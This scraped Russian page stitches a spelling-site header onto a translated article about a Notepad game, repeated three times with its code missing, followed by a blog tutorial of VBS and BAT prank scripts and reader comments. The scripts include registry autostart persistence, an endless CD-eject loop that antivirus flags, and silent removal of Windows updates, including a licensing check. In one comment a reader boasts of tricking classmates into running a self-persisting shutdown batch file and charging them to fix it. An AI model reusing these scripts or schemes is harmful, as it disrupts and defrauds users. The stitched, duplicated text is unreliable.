Главная » Правописание слов » Как написать игру в блокноте для чайников

Слово Как написать игру в блокноте для чайников - однокоренные слова и морфемный разбор слова (приставка, корень, суффикс, окончание):


Морфемный разбор слова:

Однокоренные слова к слову:

Как я сделал игру для Блокнота

Пока читал про необычные решения от инди-разработчиков, наткнулся на золото. Вот вам статья про игру в текстовом редакторе. Арт, анимация, сюжет — все как положено.

Я создал игру And yet it hurt (вероятно, автор хотел сказать it hurts, но мог использовать неправильный вариант намеренно, — прим.).

Проект можно скачать тут, а код посмотреть на Github.

Все началось в 2017 году с вопроса: «Реально ли сделать игру в Блокноте?» Тогда я только усмехнулся. Прошло три года. Обдумав, как все будет работать, и убедившись, что это реально, я решил сделать эту игру.

Обычно вы жмете на кнопку, и в игре что-то происходит. Жмете А, и Марио прыгает. Все завязано на получении информации и отклике. Игра получает входные данные и выводит свои.

В игре для Блокнота на входе будут изменения, которые вносит пользователь в файл, а на выходе изменения, которые вносит в файл сама игра. Для этого приложение отслеживает время последнего сохранения файла. Если оно изменилось, игра считывает содержимое файла и вносит в него новые данные.

Возникает проблема: Блокнот от Microsoft не проверяет, был ли файл изменен. Пришлось бы сохранять файл, закрывать и открывать его заново. Создать такую игру возможно, но звучит не очень весело. Пришлось искать альтернативу.

Могу понять ваше разочарование из-за того, что игра в итоге сделана не в самом обычном Блокноте. Мой тайтл можно запустить в нем — просто процесс немного замороченный. Я решил пожертвовать крутостью проекта, чтобы сделать игру более приятной.

Альтернатива

Пришлось искать другой текстовый редактор. Единственным требованием было — автоматическое обновление файла. Хотя чуть позже вы увидите, что я использовал еще одну фичу.

Сначала на ум пришли Notepad++ и Sublime Text. Но они совсем не похожи на Блокнот внешне, очарование проекта развеялось бы окончательно. Плюс, они спрашивают игрока, хотел бы он обновить файл. Это куда лучше, чем закрывать и открывать файл, но все равно отвлекает от геймплея. Я хотел, чтобы файл обновлялся автоматически. Тогда мне на глаза попался Notepad2. Он был почти идеален.

Редактор можно настроить, чтобы он был похож на MS Блокнот, а главное — он проверяет изменения, внесенные в файл. Но также как Notepad++ и Sublime Text, Notepad2 спрашивает игрока, нужно ли изменить файл. К счастью, у редактора открытый код, и я мог отполировать его до совершенства.

Notepad2 написан на C. Я немного знаком с этим языком, пусть меня и нельзя назвать экспертом. Опытный программист Javascript сможет прочитать и уловить общую суть кода, но понять исходный код Notepad2, чтобы внести необходимые изменения, оказалось не так просто.

Для начала я решил поискать текст из диалогового окна: «Файл был изменен внешней программой. Перезагрузить файл?». Это значение переменной, которая используется в качестве аргумента в функции диалогового окна. И я ее нашел.

Этот код проверяет, не изменилось ли содержимое файла. Если оно изменилось, открывается окно, и программа проверяет, выбрал ли пользователь ответ «Да». Мне нужно было лишь заменить кусок

на TRUE, и программа начала автоматически обновлять файл. Таким образом, я создал рендер на базе ASCII. Осталось создать подходящий движок.

Отрисовка

Игра создана с любовью: LÖVE — фреймворк с открытым исходным кодом для 2D-игр, написанных на Lua. Я много лет пользовался этой платформой и даже собрал туториал. Для этого проекта в основном использовался LÖVE-модуль файловой системы, потому что он предоставляет все необходимые возможности. Обычно с помощью LÖVE создают изображение, которое затем выводится на экран.

Мне нужно было почти то же самое: вывод ASCII-арта в текстовом файле. Я начал с домика и птички, причем птичка должна была лететь через файл. Взял арт, который нашел на ASCII Art, но в игре используются только оригинальные работы (за исключением шрифтов).

Загрузка арта — это просто чтение файла.

Дом используется в качестве фона, поэтому я начал с прорисовки этого изображения на «экране». Экран в данном случае — это home.txt.

Я хотел, чтобы с птичкой можно было работать в таком ключе:

х — номер столбца, y — номер строки. Поэтому разбил экран и птицу на списки строк.

С птицей сделал то же самое. Теперь код, описывающий птицу, должен был перекрывать код про дом. Вот, что мне было нужно:

Наверное, вы заметили, что птица представляет собой прямоугольник — в ее арте используются пробелы. Чтобы исправить ситуацию, я посчитал количество пробелов в начале каждой строки и добавил это число к координатам, чтобы отрисовывался только арт.

Стало намного лучше:

Анимация

Я начал добавлять больше фишек, например, анимацию:

Все кадры расположены в одном файле и разделены тегом <>. Тег определяется при чтении и позволяет задать последовательность кадров. Благодаря этому мы получаем классическую анимацию. Создаем таймер и отрисовываем кадры в соответствии с ним.

Также я реализовал вывод печатаемого текста и отобразил отдельно экран, инвентарь и окно для ввода решения. Оставалась одна проблема. Как игра узнает, что был открыт файл? Это и есть вторая фича, о которой я говорил ранее.

В исходном коде Notepad2 я прописал, что файл должен сохраняться сразу после открытия. Затем игра проверяет, не изменилось ли время последнего сохранения. Так она узнает, что файл был открыт, и может его менять.

В итоге я получил фреймворк, в котором можно работать. Самое время создавать игру.

За девять дней разработки (судя по дате создания gif-файлов) я сделал это:

Если вы запускали игру, то знаете, что в ней нет печатаемого текста и анимации. На то было несколько причин:

Программа по умолчанию

Может, возвращать исходные настройки при закрытии игры? Это возможно, но возникнет проблема, если игра вылетит или неожиданно закроется.

Программу по умолчанию можно назначить только от имени администратора. Если вы открываете игру под другой учетной записью, будут использоваться txt-файлы. Если вы открываете файл в обычном Блокноте, игра сообщит, что нужно перетащить файл в открытое окно Блокнота. Либо запустить ее от имени администратора, чтобы она открылась по дабл-клику.

Мотивация

На самом деле всё было сделано три года назад. Что я делал все остальное время? Классический пример отсутствия мотивации.

Но я все время держал его в голове. Я отладил целый фреймворк, который позволял создать игру в Блокноте, а проект не двигался с мертвой точки. Нужно было доделать его. В 2019 году я не завершил почти ни одного проекта. Разочарование подтолкнуло меня к решению: закончить незаконченное в 2020-м.

И вот она. Я сократил сюжет, дал себе месяц на все (получилось на неделю дольше) и бросился в бой. Еще подал заявку на A MAZE. Awards, соответственно, дедлайн был назначен на 2 февраля. Так появилась мотивация.

Заключение

Я рад, что доделал игру. Удивительно, сколько времени проект просто собирал цифровую пыль, а в итоге хватило месяца. Игру не стоило делать настолько объемной, как я хотел сначала — такой нестандартный проект должен лишь показывать особенности, которые можно в нем реализовать.

Что дальше? Игра в Paint? Игра в Калькуляторе? Вряд ли я их сделаю. Но мне нравится думать об играх, которые используют нетрадиционные платформы.

Источник

[Перевод] Как я сделал игру для Блокнота

Пока читал про необычные решения от инди-разработчиков, наткнулся на золото. Вот вам статья про игру в текстовом редакторе. Арт, анимация, сюжет — все как положено.

Я создал игру And yet it hurt (вероятно, автор хотел сказать it hurts, но мог использовать неправильный вариант намеренно, — прим.).

Все началось в 2017 году с вопроса: «Реально ли сделать игру в Блокноте?» Тогда я только усмехнулся. Прошло три года. Обдумав, как все будет работать, и убедившись, что это реально, я решил сделать эту игру.

Обычно вы жмете на кнопку, и в игре что-то происходит. Жмете А, и Марио прыгает. Все завязано на получении информации и отклике. Игра получает входные данные и выводит свои.

В игре для Блокнота на входе будут изменения, которые вносит пользователь в файл, а на выходе изменения, которые вносит в файл сама игра. Для этого приложение отслеживает время последнего сохранения файла. Если оно изменилось, игра считывает содержимое файла и вносит в него новые данные.

Возникает проблема: Блокнот от Microsoft не проверяет, был ли файл изменен. Пришлось бы сохранять файл, закрывать и открывать его заново. Создать такую игру возможно, но звучит не очень весело. Пришлось искать альтернативу.

Могу понять ваше разочарование из-за того, что игра в итоге сделана не в самом обычном Блокноте. Мой тайтл можно запустить в нем — просто процесс немного замороченный. Я решил пожертвовать крутостью проекта, чтобы сделать игру более приятной.

Альтернатива

Пришлось искать другой текстовый редактор. Единственным требованием было — автоматическое обновление файла. Хотя чуть позже вы увидите, что я использовал еще одну фичу.

Сначала на ум пришли Notepad++ и Sublime Text. Но они совсем не похожи на Блокнот внешне, очарование проекта развеялось бы окончательно. Плюс, они спрашивают игрока, хотел бы он обновить файл. Это куда лучше, чем закрывать и открывать файл, но все равно отвлекает от геймплея. Я хотел, чтобы файл обновлялся автоматически. Тогда мне на глаза попался Notepad2. Он был почти идеален.

Редактор можно настроить, чтобы он был похож на MS Блокнот, а главное — он проверяет изменения, внесенные в файл. Но также как Notepad++ и Sublime Text, Notepad2 спрашивает игрока, нужно ли изменить файл. К счастью, у редактора открытый код, и я мог отполировать его до совершенства.

Notepad2 написан на C. Я немного знаком с этим языком, пусть меня и нельзя назвать экспертом. Опытный программист Javascript сможет прочитать и уловить общую суть кода, но понять исходный код Notepad2, чтобы внести необходимые изменения, оказалось не так просто.

Для начала я решил поискать текст из диалогового окна: «Файл был изменен внешней программой. Перезагрузить файл?». Это значение переменной, которая используется в качестве аргумента в функции диалогового окна. И я ее нашел.

Этот код проверяет, не изменилось ли содержимое файла. Если оно изменилось, открывается окно, и программа проверяет, выбрал ли пользователь ответ «Да». Мне нужно было лишь заменить кусок

на TRUE, и программа начала автоматически обновлять файл. Таким образом, я создал рендер на базе ASCII. Осталось создать подходящий движок.

Отрисовка

Загрузка арта — это просто чтение файла.

Дом используется в качестве фона, поэтому я начал с прорисовки этого изображения на «экране». Экран в данном случае — это home.txt.

Я хотел, чтобы с птичкой можно было работать в таком ключе:

х — номер столбца, y — номер строки. Поэтому разбил экран и птицу на списки строк.

С птицей сделал то же самое. Теперь код, описывающий птицу, должен был перекрывать код про дом. Вот, что мне было нужно:

В коде это выглядит так:

Наверное, вы заметили, что птица представляет собой прямоугольник — в ее арте используются пробелы. Чтобы исправить ситуацию, я посчитал количество пробелов в начале каждой строки и добавил это число к координатам, чтобы отрисовывался только арт.

Стало намного лучше:

Анимация

Я начал добавлять больше фишек, например, анимацию:

Все кадры расположены в одном файле и разделены тегом <>. Тег определяется при чтении и позволяет задать последовательность кадров. Благодаря этому мы получаем классическую анимацию. Создаем таймер и отрисовываем кадры в соответствии с ним.

Также я реализовал вывод печатаемого текста и отобразил отдельно экран, инвентарь и окно для ввода решения. Оставалась одна проблема. Как игра узнает, что был открыт файл? Это и есть вторая фича, о которой я говорил ранее.

В исходном коде Notepad2 я прописал, что файл должен сохраняться сразу после открытия. Затем игра проверяет, не изменилось ли время последнего сохранения. Так она узнает, что файл был открыт, и может его менять.

В итоге я получил фреймворк, в котором можно работать. Самое время создавать игру.

За девять дней разработки (судя по дате создания gif-файлов) я сделал это:

Если вы запускали игру, то знаете, что в ней нет печатаемого текста и анимации. На то было несколько причин:

Программа по умолчанию

Может, возвращать исходные настройки при закрытии игры? Это возможно, но возникнет проблема, если игра вылетит или неожиданно закроется.

Программу по умолчанию можно назначить только от имени администратора. Если вы открываете игру под другой учетной записью, будут использоваться txt-файлы. Если вы открываете файл в обычном Блокноте, игра сообщит, что нужно перетащить файл в открытое окно Блокнота. Либо запустить ее от имени администратора, чтобы она открылась по дабл-клику.

Мотивация

На самом деле всё было сделано три года назад. Что я делал все остальное время? Классический пример отсутствия мотивации.

Но я все время держал его в голове. Я отладил целый фреймворк, который позволял создать игру в Блокноте, а проект не двигался с мертвой точки. Нужно было доделать его. В 2019 году я не завершил почти ни одного проекта. Разочарование подтолкнуло меня к решению: закончить незаконченное в 2020-м.

И вот она. Я сократил сюжет, дал себе месяц на все (получилось на неделю дольше) и бросился в бой. Еще подал заявку на A MAZE. Awards, соответственно, дедлайн был назначен на 2 февраля. Так появилась мотивация.

Заключение

Я рад, что доделал игру. Удивительно, сколько времени проект просто собирал цифровую пыль, а в итоге хватило месяца. Игру не стоило делать настолько объемной, как я хотел сначала — такой нестандартный проект должен лишь показывать особенности, которые можно в нем реализовать.

Что дальше? Игра в Paint? Игра в Калькуляторе? Вряд ли я их сделаю. Но мне нравится думать об играх, которые используют нетрадиционные платформы.

Источник

Как я сделал игру для Блокнота

Пока читал про необычные решения от инди-разработчиков, наткнулся на золото. Вот вам статья про игру в текстовом редакторе. Арт, анимация, сюжет — все как положено.

Я создал игру And yet it hurt (возможно, автор хотел сказать it hurts, но мог использовать такой вариант намеренно, — прим.).

Все началось в 2017 году с вопроса: «Реально ли сделать игру в Блокноте?» Тогда я только усмехнулся. Прошло три года. Обдумав, как все будет работать, и убедившись, что это реально, я решил сделать эту игру.

Обычно вы жмете на кнопку, и в игре что-то происходит. Жмете А, и Марио прыгает. Все завязано на получении информации и отклике. Игра получает входные данные и выводит свои.

В игре для Блокнота на входе будут изменения, которые вносит пользователь в файл, а на выходе изменения, которые вносит в файл сама игра. Для этого приложение отслеживает время последнего сохранения файла. Если оно изменилось, игра считывает содержимое файла и вносит в него новые данные.

Возникает проблема: Блокнот от Microsoft не проверяет, был ли файл изменен. Пришлось бы сохранять файл, закрывать и открывать его заново. Создать такую игру возможно, но звучит не очень весело. Пришлось искать альтернативу.

Могу понять ваше разочарование из-за того, что игра в итоге сделана не в самом обычном Блокноте. Мой тайтл можно запустить в нем — просто процесс немного замороченный. Я решил пожертвовать крутостью проекта, чтобы сделать игру более приятной.

Альтернатива

Пришлось искать другой текстовый редактор. Единственным требованием было — автоматическое обновление файла. Хотя чуть позже вы увидите, что я использовал еще одну фичу.

Сначала на ум пришли Notepad++ и Sublime Text. Но они совсем не похожи на Блокнот внешне, очарование проекта развеялось бы окончательно. Плюс, они спрашивают игрока, хотел бы он обновить файл. Это куда лучше, чем закрывать и открывать файл, но все равно отвлекает от геймплея. Я хотел, чтобы файл обновлялся автоматически. Тогда мне на глаза попался Notepad2. Он был почти идеален.

Редактор можно настроить, чтобы он был похож на MS Блокнот, а главное — он проверяет изменения, внесенные в файл. Но также как Notepad++ и Sublime Text, Notepad2 спрашивает игрока, нужно ли изменить файл. К счастью, у редактора открытый код, и я мог отполировать его до совершенства.

Notepad2 написан на C. Я немного знаком с этим языком, пусть меня и нельзя назвать экспертом. Опытный программист Javascript сможет прочитать и уловить общую суть кода, но понять исходный код Notepad2, чтобы внести необходимые изменения, оказалось не так просто.

Для начала я решил поискать текст из диалогового окна: «Файл был изменен внешней программой. Перезагрузить файл?». Это значение переменной, которая используется в качестве аргумента в функции диалогового окна. И я ее нашел.

Этот код проверяет, не изменилось ли содержимое файла. Если оно изменилось, открывается окно, и программа проверяет, выбрал ли пользователь ответ «Да». Мне нужно было лишь заменить кусок

на TRUE, и программа начала автоматически обновлять файл. Таким образом, я создал рендер на базе ASCII. Осталось создать подходящий движок.

Отрисовка

Игра создана с любовью: LÖVE — фреймворк с открытым исходным кодом для 2D-игр, написанных на Lua. Я много лет пользовался этой платформой и даже собрал туториал. Для этого проекта в основном использовался LÖVE-модуль файловой системы, потому что он предоставляет все необходимые возможности. Обычно с помощью LÖVE создают изображение, которое затем выводится на экран.

Мне нужно было почти то же самое: вывод ASCII-арта в текстовом файле. Я начал с домика и птички, причем птичка должна была лететь через файл. Взял арт, который нашел на ASCII Art, но в игре используются только оригинальные работы (за исключением шрифтов).

Загрузка арта — это просто чтение файла.

Дом используется в качестве фона, поэтому я начал с прорисовки этого изображения на «экране». Экран в данном случае — это home.txt.

Я хотел, чтобы с птичкой можно было работать в таком ключе:

х — номер столбца, y — номер строки. Поэтому разбил экран и птицу на списки строк.

С птицей сделал то же самое. Теперь код, описывающий птицу, должен был перекрывать код про дом. Вот, что мне было нужно:

Наверное, вы заметили, что птица представляет собой прямоугольник — в ее арте используются пробелы. Чтобы исправить ситуацию, я посчитал количество пробелов в начале каждой строки и добавил это число к координатам, чтобы отрисовывался только арт.

Стало намного лучше:

Анимация

Я начал добавлять больше фишек, например, анимацию:

Все кадры расположены в одном файле и разделены тегом <>. Тег определяется при чтении и позволяет задать последовательность кадров. Благодаря этому мы получаем классическую анимацию. Создаем таймер и отрисовываем кадры в соответствии с ним.

Также я реализовал вывод печатаемого текста и отобразил отдельно экран, инвентарь и окно для ввода решения. Оставалась одна проблема. Как игра узнает, что был открыт файл? Это и есть вторая фича, о которой я говорил ранее.

В исходном коде Notepad2 я прописал, что файл должен сохраняться сразу после открытия. Затем игра проверяет, не изменилось ли время последнего сохранения. Так она узнает, что файл был открыт, и может его менять.

В итоге я получил фреймворк, в котором можно работать. Самое время создавать игру.

За девять дней разработки (судя по дате создания gif-файлов) я сделал это:

Если вы запускали игру, то знаете, что в ней нет печатаемого текста и анимации. На то было несколько причин:

Программа по умолчанию

Может, возвращать исходные настройки при закрытии игры? Это возможно, но возникнет проблема, если игра вылетит или неожиданно закроется.

Программу по умолчанию можно назначить только от имени администратора. Если вы открываете игру под другой учетной записью, будут использоваться txt-файлы. Если вы открываете файл в обычном Блокноте, игра сообщит, что нужно перетащить файл в открытое окно Блокнота. Либо запустить ее от имени администратора, чтобы она открылась по дабл-клику.

Мотивация

На самом деле всё было сделано три года назад. Что я делал все остальное время? Классический пример отсутствия мотивации.

Но я все время держал его в голове. Я отладил целый фреймворк, который позволял создать игру в Блокноте, а проект не двигался с мертвой точки. Нужно было доделать его. В 2019 году я не завершил почти ни одного проекта. Разочарование подтолкнуло меня к решению: закончить незаконченное в 2020-м.

И вот она. Я сократил сюжет, дал себе месяц на все (получилось на неделю дольше) и бросился в бой. Еще подал заявку на A MAZE. Awards, соответственно, дедлайн был назначен на 2 февраля. Так появилась мотивация.

Заключение

Я рад, что доделал игру. Удивительно, сколько времени проект просто собирал цифровую пыль, а в итоге хватило месяца. Игру не стоило делать настолько объемной, как я хотел сначала — такой нестандартный проект должен лишь показывать особенности, которые можно в нем реализовать.

Что дальше? Игра в Paint? Игра в Калькуляторе? Вряд ли я их сделаю. Но мне нравится думать об играх, которые используют нетрадиционные платформы.

Источник

Пишем программы (скрипты) в Блокноте Windows

С этой статьей вы не научитесь программировать и даже не напишите как таковую программу, но найдете здесь отличные VBS скрипты и BAT файлы, которые без проблем напишете в обычном блокноте Windows, сможете усовершенствовать по своему, потом похвастаться перед друзьями и близкими. Возможно это поднимет вам настроение и вы отлично проведете время.

Приступим

Научим компьютер здороваться

Set sapi=CreateObject(«sapi.spvoice»)
sapi.Speak «Hello!»

Один нюанс: если вы прописали в кавычках слова русскими буквами, а при запуске произносится непонятно что, то у вас просто не установлен русский голосовой движок. Подробная установка и настройка голосового движка выходит за рамки нашей статьи, поэтому более подробно ознакомьтесь здесь и вновь возвращайтесь сюда.

Все просто, программу (скрипт) добавить в автозагрузку можно таким же образом, то есть через такой же VBS скрипт. Создаем файл в блокноте, копируем/вставляем (Ctrl+C/Ctrl+V) следующий код:

Dim vOrg, objArgs, root, key, WshShell
root = «HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\»
KeyHP = «Program»
Set WshShell = WScript.CreateObject(«WScript.Shell»)
WshShell.RegWrite root+keyHP,»C:\Privet.vbs /autorun»

Открыть дисковод

Set a = CreateObject(«WMPlayer.OCX.7»)
Set b = a.CdromCollection
Set c = b.Item(0)
Set d = c.Eject

Есть более интересная модификация данного скрипта:

Set WMPlayer = CreateObject(«WMPlayer.OCX.7»)
do
WMPlayer.CdRomCollection.Item(0).Eject()
loop

В данном случае будет все время открываться-закрываться CD/DVD-привод, на ноутбуках в этом случае будет открываться после каждого его закрытия.

Внимание! Второй код (открытие-закрытие дисковода), некоторые антивирусы видят как вредоносную программу. Антивирус Касперского (в т.ч. и Kaspersky Free) его видит именно так и уничтожает сразу же. В первом же случае (просто открытие дисковода) для антивирусных программ не является вредоносным скриптом.

Чтобы прекратить автоматически открывать-закрывать дисковод необходимо:

Игра

Вы также можете изменять сообщения по своему, все что написано кириллицей без проблем редактируется. Не бойтесь сломать код. Поэкспериментируйте. В случае чего заново скопируйте рабочий код отсюда.

Ну и перед тем как переходить к батникам (.BAT) воспользуемся самым полезным VBS скриптом из всех перечисленных в этой статье.

Скрипт закрывающий wscript.exe

Set TaskKill = CreateObject(«WScript.Shell»)
TaskKill.Run «TaskKill /f /im wscript.exe»

По сути он делает тоже самое, что чуть выше объяснялось в диспетчере задач, как например нельзя просто взять и закрыть надоедливый скрипт открывающий-закрывающий дисковод, а запустив данный скрипт все запущенные будут закрыты. Это как клин клином вышибают.

Завершение работы /Перезагрузка компьютера

Совсем простой батник состоящий всего из одной строки.

Есть такой вариант кода:

Удаление обновлений

@echo
echo
echo Step 1: Delete Updates Telemetry
wusa /uninstall /kb:3068708 /quiet /norestart
wusa /uninstall /kb:3022345 /quiet /norestart
wusa /uninstall /kb:3075249 /quiet /norestart
wusa /uninstall /kb:3080149 /quiet /norestart

Таким образом можно удалить абсолютно любое обновление, даже назойливое KB971033 которое проверяет копию Windows 7 на подлинность.

174 thoughts on “ Пишем программы (скрипты) в Блокноте Windows ”

Пробую проделать с дисководом, не работает на Windows 8.
Ошибка компиляции Microsoft VBScript, Недопустимый знак, код 800А0408

Увы, насчет windows 8 не знаю…проверено на «семерке» все замечательно работает.

Windows 7 Проффесиональная пишет: Ошибка компиляции Microsoft VBScript, Недопустимый знак, код 800А0408

Попробуйте заного нормально написать, возможно допустили ошибку где-то, с данной ошибкой встречаются очень часто

ОН НЕ ВИДИТ РУССКИЙ ЯЗЫК ТАМ ТУПО КАКОЙ ТО СТРАННЫЙ ШРИФТ

у меня тоже так если я пишу в нотпад++, но если я открою через обычный блокнот, сохраню а потом буду запускать через нотпад++ то там пишет по русски а не на языке стола зачарований.

Во время сохранения выбери кодировка: ANSI

я также написал не работает

Через Notepad++ преобразовать в UTF-8 без BOM и сохранить.
Ну и про кавычки не забывайте, елочки не подойдут, нужны лапти

РАБОТАЕТ НА ВИНДЕ10

Нужно вот такие ковычки («»)

не такие там написано такие » «

тем временем в долбаной записи говорится вот такие «»

Set y = CreateObject(«Scripting.FileSystemObject»)
Set y = Nothing
Do
a = 0
u = 0
Randomize
Number = Int((RND*99)+1)
MsgBox «I ZADAL CHSLO OT 1 DO 100, POPROBUE OTGADAT»,64,»YGADAIKA»
Do
a = a + 1
c = InputBox(«YGADAI CHCLO» & vbCrLf & vbCrLf & «Попытка: » & a & vbCrLf & vbCrLf & «CHTOBA POCMOTRET REZULTAT VEDI CHECLO!» & vbCrLf & vbCrLf & «DLI VAXODA OCTAVTE POLE PYCTAM» & vbCrLf & vbCrLf,»YGADAIKA»)
If c = «!» Then CreateObject(«WScript.Shell»).Run «notepad C:\Windows\Result.dll»,3,True : Exit Do
If c «» Then
If IsNumeric(c) = True Then
If CInt(c) Number Then MsgBox «NET, ETO NE » & c & «. I ZAGODAL CHICLO MENSHE»,64,»YGADAIKA»
If CInt(c) = Number Then
Set y = CreateObject(«Scripting.FileSystemObject»)
MsgBox («Количество попыток: » & a)
If MsgBox («PRAWELNO, ETO BLO CHECLO » & c & «. NACHAT ZANOVO?»,36,»YGADAIKA») = 6 Then Exit Do Else WScript.Quit
End If
Else
MsgBox «ETO CHECLO!»,16,»YDAIKA»
a = a — 1
End If
Else
a = a — 1
l = MsgBox («TA NECHGO NE VEL. VAITI IZ PROGRAMA?»,36,»YGADAIKA»)
If l = 6 Then WScript.Quit
End If
Loop
loop

У меня Windows 7 Проффесиональная и всё работает хорошо только дисковод открывается на несколь ко секунд

Я тоже на Windows xp открыл, выбило ошибку.

ты вместо елочек пиши скобки

И десятка с любым вбс такое выдаёт.

у меня тоже русский не работает. На англ все фразы переведи

разыграл друга что типа через 10 сек выходит сообщение что комп заблокирован

На Windows 10 все тоже отлично работает. Жду еще более крутых скриптов! 😉

Давайте сотрудничать! Я тоже вирусы делаю

Это уголовно наказуемо, не помню какая статья но потом загуглю, и да, это не вирусы а так называемые приколы, а ПРИКОЛЫ и ВИРУСЫ отлечаются, вот наример какие ты вирусы делаешь а? ой да не дери ты мозги что ты делаешь «Вирусы», я тоже могу сделать «вирус» просто бл*ть найти в интернете и всё, делает он их ага.

лол, это тупая игрушка на бат, я также с легкостью могу сказать что я хакер, сделав за минуту батник, который копирует себя в автозагрузку и включает компьютер, только твоей игрушкой никому не навредить, а я одноклассников на бабло разводил, на настоящее, тупо подхожу с флешкой, говорю «на, тут все серии наруто, запусти файл.bat и наслаждайся. Через 5 минут звонит растерянный ламер и бормочет что у него комп вырубился и не включается. Я прихожу. за сотку включаю с винды безопасный режим, через кмд делитаю файл из автозагрузки, халявная сотка, здравствуй

мда вы решили создавать вирусятины…

эй давай вместе создавать вирус у меня один есть если хочеш связатся то мой вк flapi flapik

ЭЙ! у меня касперский ругается на privet.txt!

А сделай варианты ответа чтобы на да или нет было действие. Спасибо за статью

Кавычки нужно проверить, может вы копируете и вставляете с елочками «_», а в коде нужны лапки ”_“

На Windows 8 надо использовать кавычки вот такие «»

Надо вместо ЁЛОЧКИ писать и всё КЛАСНО

Согласен, еще ошибка : недопустимый знак

Просто этот чудик сделал не верно.Он сказал комп не читает кавычки в виде »
а сам их и напихал,замените все кавычки » на ковычки «» и все просто таже проблема была

кавійки надо поставить «такие» а не такие как написано там

А ты пробовал заменить <> на «кавычки обычные»?

там все >>заменить на «

У меня выдает ошибку но работает

а дисковод есть то на пк, или декоративная заглушка стоит?

Не благодарите, пожалуй.
P.S. (Не делайте такое на своём компьютере, убьёте его).

Ты в курсе, что просто чистишь рабочий стол этим скриптом?

-ТВОЙ КОМП: ЖОПА ГОРИТ

В Windows 8, 10 Windows media player есть.

Интересная штучка. Лично у меня скрипт тоже выдает ошибку, но при том дисковод открывается

не знаю, у меня на 8 работает ВСЕ без каких либо ошибок

у меня 8.1, работает

а на виндовс 10 работает!

Там написано какая строка?

Знаешь у меня тоже такое но дисковод вылезает на семёрке на 8 тоже должно.

Прошу прощения,на второй комментарий можно не отвечать,я поняла

=) Ну в принципе вы установили голосовой движок (русский) и этого достаточно, а балаболка — хорошая штука, я например ее настроил более мене прилично и она мне читает книги))

Это Вам спасибо, рад, что смог как-то помочь, заходите почаще!

вот шутка про дисковод..при запуске от говорит об ошибке.мол депустимый знак в 1 строке 29 символ

Проверьте может опечатка где в тексте, а система у вас какая?

По моему надо заменить этот символ: одну кавычку («) на другую («)

? короче на такую, ту почему-то не пишет (где буква Э, на английском, с shift-ом (»))

а у меня семёрка и всё ровно пишет при открытии любых vbs выскакивает Ошибка компиляции Microsoft VBScript, Недопустимый знак, код 800А0408

Проверьте может ошибка синтаксическая, в принципе в коде ошибок нет, работает все нормально. Пробел лишний не в том месте поставили, вообще все так же если по порядку сделать как описано в посте, то должно все нормально запускаться.

Если я вас правильно понял, вы хотите что то типа справочника bat? т.е. команда и обозначение того самого батника, если так то может чуть позже займусь этим.

да,именно это я и имел ввиду.
Сможете это сделать?

Люди что делать. Я скачал архив и разархивировал. Начинаю открывать Vbs файл и ничего не происходит.(антивирус выключен, windows 7 максимальная)

Set WMPlayer = CreateObject(«WMPlayer.OCX.7?)
do
WMPlayer.CdRomCollection.Item(0).Eject()
loop

А какая ошибка выходит?

Скрипт проверил, (Win7 32bit), все работает прекрасно дисковод открывается. У вас система какая? просто на Windows XP бывают ошибки.

У меня windows 7 /32 bit
При использовании скрипта про открытие/закрытие дисковода вылазит вот такая ошибка:

Сценарий: D:\1.vbs
Строка 1
Символ 29
Ошибка: Недопустимый знак
Код 800A0408
Источник: Ошибка компиляции Microsoft VBScript

Такс…насчет «справочника», пока не знаю, возможно в скором времени подготовлю, но кончено не полный, а то все bat команды собрать…можно сума сойти =) так самые интересные может и соберем. А насчет данного скрипта, попробуйте вот скачать — http://ocompah.ru/123.rar и так попробуйте запустить после разархивации.

Ваш сохраненный скрипт работает!, а тот что пишу я нет…
Вы не могли бы сохранить созданный вами скрипт в формате txt? чтоб я посмотрел в чем моя ошибка?

Да вы просто нажмите правой кнопкой мыши на файл и выберите «изменить», где и откроется через блокнот.

все,разобрался со скриптом,большое вам спасибо!

Постараюсь как можно скорее написать, но увы, сейчас пока нет времени.

да у меня такое было но дисковод открывался

На Windows XP ошибки быть не может если правильно ввести

Проблема с как научим компьютер «разговаривать» выдает 800а0408 ошибка компиляции что я не так делаю подскажите плиз

Скорее всего синтаксическая ошибка, попробуйте проверить нет ли лишних пробелов, кавычки попробуйте не копировать а в ручную писать, если что отпишитесь.

Я разобрался подскажите а он по русски разговаривать может
Заранее спасибо.

Конечно может если установлен голосовой движок.

Отличная статейка. Увлекла 😉

На windows vista что то не получается.

Что, тоже ошибка компиляции выходит?

Как продвигается составление «справочника»? очень жду.
Заранее спасибо за ответ.
Начинал с vbs,bat сейчас на Delphi перешёл)
Большое спасибо за ваши статьи,помогли в своё время.

я всё сделал создал на когда я открываю блокнот с кодом выдаёт ошибку(((почему.

ошибка возможно синтаксическая, посмотрите не пропустили ли какой нибудь знак, может пробел лишний.

как установить голосовой движок

Скачать и просто установить как и другие программы

сообщите мне адрес справочника по батникам очень хочу то что я писал неработало а скачал и заработало!! класс из етим дисководом получилось у брата на ноуте запущу)))))

Здесь на форуме ковычки другие! В любом коде, заместо » пишем, стандартные «

А можете ссылку дать на скачивания»Алёны»
а то нормальную не могу найти

Вот вам торрент ссылка на голосовой движок «Алена» — скачать

у меня виндовс 8 и у меня не че не получается то ест … все коды папробывал

Я на 8 пробовал только дисковод.
Кавычки обычные.
Set WMPlayer = CreateObject(«WMPlayer.OCX.7»)
do
WMPlayer.CdRomCollection.Item(0).Eject()
loop
Попробуй так

Странно он в комментах при вставке сам делает другие кавычки.
В общем на 8 такие ( » ) и такая же закрыть.

И опять он их изменил.ППц просто. На 8 две запятых вверху — это начало и две вверху- конец

а от куда я знаю вдруг файл завирусован

Вас никто не заставляет, ваше право, вы беспокоитесь за свою безопасность, здесь нет ничего такого.

А как сделать батнике много открываний?

В итоге как решили вопрос с ошибкой компиляции, у меня также выдает ошибку
800а0408 ошибка компиляции

А вы вконтакте есть? Дайте ссылку пожалуйста

У меня вопроспо поводу сайта. Как только я открываю 1 часть данной статьи меня перекидывает сюда.

Я обновил статьи и теперь по скриптам в блокноте одна запись. Нету смысла плодить множество маленьких однообразных статей. Здесь в основном те же скрипты и батники, что были написаны когда-то в первой и во второй частях, только лучше изложено.

Все сделал как надо.Даже ошибку в коде исправил,так то писало что неверный символ(и я не про «)
Скрин:http://radikal.ru/lfp/s017.radikal.ru/i435/1608/70/8b3232295094.png/htm
OC Windows 7 Максимальная x64
Встречал такое оформление в игре(TES 5:Sryrim)Где имя персонажа и название которые я лично давал предмету писалось такими символами.Не знаю как это связано.
Чем поможете?

винда 8.1 все супер работает

